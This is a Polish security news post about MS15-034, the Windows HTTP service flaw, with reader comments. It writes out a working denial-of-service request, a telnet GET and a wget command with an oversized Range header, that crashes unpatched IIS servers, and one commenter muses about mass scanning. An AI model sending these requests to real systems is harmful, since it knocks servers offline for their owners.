15.04.2015 | 20:26

Adam Haertle

Pierwszy exploit na MS15-034

Wygląda na to, że mamy pierwszego prostego exploita na poważny błąd w usłudze HTTP w systemach Windows. Na razie to tylko DoS, czekamy dalej na kod prowadzący do RCE. Aby wywołać piękny niebieski ekran trzeba wykonać następującą sekwencję komend:

telnet target 80
GET /iis-85.png HTTP/1.1
Host: cokolwiek
Range: bytes=18-18446744073709551615

lub na przykład

wget --header="Range: bytes=18-18446744073709551615 http://192.168.0.28/welcome.png"

Wywołanie GET musi prowadzić do istniejącego pliku, zatem dla Windows 2012 będzie to iis-85.png, a dla Windows 2008 welcome.png. Dalsze dyskusje na temat możliwości wykorzystania błędu oraz exploitów możecie znaleźć na stronach Metasploitrootsec oraz ma.ttias.be a w serwisie xpaw znajdziecie zdalny tester podatności.

 iis

Powrót

Komentarze

  • 2015.04.15 21:07 Marcin

    Szybki strzał z masscan i 1/10 internetu padnie?

    Odpowiedz
  • 2015.04.15 22:23 Czesław

    Jezu, to się w głowie nie mieści

    Odpowiedz
  • 2015.04.15 22:55 Tomek

    Nasz standard bezpieczeństwa zabezpiecza przed konsekwencjami tego błędu:

    http://fajne.it/standard-konfiguracji-windows.html

    Wprawdzie nadal można odpalić DoS, ale exploitować można tylko poprzez odpalenie pojedynczej binarki. Tymczasem nasz standardowy layout katalogów połączony z włączonym SRP powoduje, że odpalenie tej binarki się nie uda.

    (Aby było jasne, tak, to jest kryptoreklama. Ale w dobrej intencji.)

    Odpowiedz
  • 2015.04.16 12:57 Dev0

    Wow, W10 TP padł jak zaczarowany … nice …

    Odpowiedz

Zostaw odpowiedź do Marcin

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Pierwszy exploit na MS15-034

Komentarze